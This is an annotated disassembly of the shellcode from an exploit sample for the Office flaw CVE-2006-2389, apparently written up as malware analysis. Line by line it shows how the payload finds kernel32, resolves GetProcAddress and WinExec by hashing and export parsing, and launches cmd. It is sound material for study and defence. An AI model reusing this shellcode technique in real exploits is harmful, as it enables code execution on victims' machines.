Microsoft Office Property Code Execution exploit, vulnerability no. CVE-2006-2389. In September, sebug obtained a sample of it and analyzed it, intending to write a new exploit tool for this vulnerability; here we disassemble and explain the sample's shellcode.
// Annotated debugger listing (32-bit x86; columns: address, opcode bytes, instruction, note).
// Stages visible here: (1) walk PEB->Ldr->InMemoryOrderModuleList, hashing each module's
// BaseDllName with a ror-13/add loop until the hash matches kernel32.dll; (2) parse kernel32's
// export directory by name to locate GetProcAddress; (3) GetProcAddress(kernel32, "WinExec");
// (4) WinExec("cmd", SW_SHOW). Register roles: edx = list cursor / PE pointer, ebx = kernel32
// base, edi = name hash, esi = string/table cursor, ecx = counter/index, eax = scratch/result.
0830674C fc cld // DF = 0 so the lods instructions below walk forward (esi increments)
0830674D 33D2 xor edx // edx = 0 (the ", edx" operand text is missing in this listing; bytes 33 D2 encode xor edx, edx)
0830674F B2 30 mov dl, 30 // edx = 0x30
08306751 64: FF32 push dword ptr fs: [EDX] // fs:[0x30] is the TEB's PEB pointer; push it
08306754 5A pop edx // edx = PEB
08306755 8B52 0C mov edx, dword ptr ds: [EDX + C] // edx = PEB->Ldr (PEB_LDR_DATA)
08306758 8B52 14 mov edx, dword ptr ds: [EDX + 14] // edx = Ldr->InMemoryOrderModuleList.Flink, i.e. the first entry's InMemoryOrderLinks field (entry + 8)
0830675B 8B72 28 mov esi, dword ptr ds: [EDX + 28] // module-scan loop head: esi = entry->BaseDllName.Buffer (entry + 0x30, a UTF-16 name); the first entry is the host executable itself
0830675E 33C9 xor ecx, ECX // ecx = 0
08306760 B1 18 mov cl, 18 // ecx = 0x18 = 24 bytes = 12 UTF-16 code units of the name to hash (one byte per iteration below)
08306762 33FF xor edi, EDI // edi = 0: the running name hash
08306764 33C0 xor eax, EAX // hash-loop body starts here (target of the loop at 08306772): eax = 0 so only al contributes to the add below
08306766 ac lods byte ptr ds: [ESI] // al = *esi++ (one byte of the UTF-16 name; for ASCII characters every second byte is the 0 high byte)
08306767 3C 61 cmp al, 61 // compare with 'a' (0x61)
08306769 7C 02 jl short 0830676D // if al < 'a' (signed compare, so bytes >= 0x80 also take this path) leave the byte unchanged
0830676B 2C 20 sub al, 20 // otherwise al -= 0x20: maps lowercase a-z to uppercase A-Z (case-folds the name before hashing)
0830676D C1CF 0D ror edi, 0D // hash = ror(hash, 13)
08306770 03F8 add edi, EAX // hash += al (eax was zeroed, so only the byte is added)
08306772 ^ E2 F0 loopd short 08306764 // ecx--; repeat from 08306764 while ecx != 0 (24 bytes in total)
08306774 81FF 5BBC4A6A cmp edi, 6A4ABC5B // compare with the ror-13 hash of "KERNEL32.DLL" (uppercased UTF-16, 24 bytes); the scan stops on this module
0830677A 8B5A 10 mov ebx, dword ptr ds: [EDX + 10] // ebx = entry->DllBase (entry + 0x18): base of the module just hashed (mov preserves the cmp flags)
0830677D 8B12 mov edx, dword ptr ds: [EDX] // edx = Flink: advance to the next module entry
0830677F ^ 75 da jnz short 0830675B // hash mismatch: hash the next module; on a match fall through with ebx = kernel32.dll base
08306781 8B53 3C mov edx, dword ptr ds: [EBX + 3C] // edx = e_lfanew (offset of the PE header)
08306784 03D3 add edx, EBX // edx = IMAGE_NT_HEADERS of kernel32.dll
08306786 FF72 34 push dword ptr ds: [EDX + 34] // pushes OptionalHeader.ImageBase (NT header + 0x34); it is never consumed in this listing — presumably a leftover or stack padding, verify against the full sample
08306789 8B52 78 mov edx, dword ptr ds: [EDX + 78] // edx = DataDirectory[0].VirtualAddress (NT header + 0x78): RVA of the export directory
0830678C 03D3 add edx, EBX // edx = IMAGE_EXPORT_DIRECTORY
0830678E 8B72 20 mov esi, dword ptr ds: [EDX + 20] // esi = AddressOfNames RVA
08306791 03F3 add esi, EBX // esi = array of exported-name RVAs
08306793 33C9 xor ecx, ECX // ecx = 0: name index, pre-incremented below so it is 1-based inside the loop
08306795 41 INC ECX // name-scan loop head: ecx = index + 1
08306796 ad lods dword ptr ds: [ESI] // eax = next name RVA, esi += 4
08306797 03C3 add eax, EBX // eax = name string VA
08306799 8138 47657450 cmp dword ptr ds: [EAX], 50746547 // first 4 chars == "GetP" (bytes 47 65 74 50)
0830679F ^ 75 F4 jnz short 08306795 // no: try the next name
083067A1 8178 04 2017f634> cmp dword ptr ds: [EAX + 4], 41636F72 // chars 4..7 == "rocA"
083067A8 ^ 75 eb jnz short 08306795 // no: next name
083067AA 8178 08 6464726> cmp dword ptr ds: [EAX + 8], 65726464 // chars 8..11 == "ddre"; the three compares together match the 12-byte prefix "GetProcAddre", i.e. GetProcAddress
083067B1 ^ 75 E2 jnz short 08306795 // no: next name
083067B3 49 DEC ECX // ecx = zero-based index of the matching name
083067B4 8B72 24 mov esi, dword ptr ds: [EDX + 24] // esi = AddressOfNameOrdinals RVA
083067B7 03F3 add esi, EBX // esi = ordinal table VA
083067B9 66: 8B0C4E mov cx, word ptr ds: [ESI + ECX * 2] // cx = ordinal for that name (16-bit write; relies on the upper half of ecx already being 0)
083067BD 8B72 1C mov esi, dword ptr ds: [EDX + 1C] // esi = AddressOfFunctions RVA
083067C0 03F3 add esi, EBX // esi = function address table VA
083067C2 8B148E mov edx, dword ptr ds: [ESI + ECX * 4] // edx = RVA of GetProcAddress
083067C5 03D3 add edx, EBX // edx = &GetProcAddress
083067C7 52 PUSH EDX // keep a copy of &GetProcAddress on the stack (not read again in this listing)
083067C8 68 78656301 PUSH 1636578 // bytes 78 65 63 01 = "xec\x01"
083067CD FE4C24 03 dec byte ptr ss: [ESP + 3] // 0x01 -> 0x00: the dword now reads "xec\0"; the 01/dec pair presumably keeps a literal NUL out of the code bytes
083067D1 68 57696E45 PUSH 456E6957 // "WinE"; the stack now holds the NUL-terminated string "WinExec"
083067D6 54 PUSH ESP // arg 2: lpProcName = &"WinExec"
083067D7 53 PUSH EBX // arg 1: hModule = kernel32.dll base
083067D8 FFD2 call edx // eax = GetProcAddress(kernel32, "WinExec"); stdcall, so the callee pops both args
083067DA 68 636D6401 PUSH 1646D63 // bytes 63 6D 64 01 = "cmd\x01"
083067DF FE4C24 03 dec byte ptr ss: [ESP + 3] // 0x01 -> 0x00: the dword now reads "cmd\0"
083067E3 6A 05 PUSH 5 // arg 2: uCmdShow = 5 (SW_SHOW)
083067E5 33C9 xor ecx, ECX // ecx = 0 (scratch; overwritten by the lea below)
083067E7 8D4C24 04 lea ecx, dword ptr ss: [ESP + 4] // ecx = &"cmd" (skips the pushed 5)
083067EB 51 push ecx // arg 1: lpCmdLine = "cmd"
083067EC FFD0 CALL EA // bytes FF D0 = call eax (operand truncated in this listing): WinExec("cmd", SW_SHOW) — the payload's observable effect is a spawned cmd.exe; the listing ends here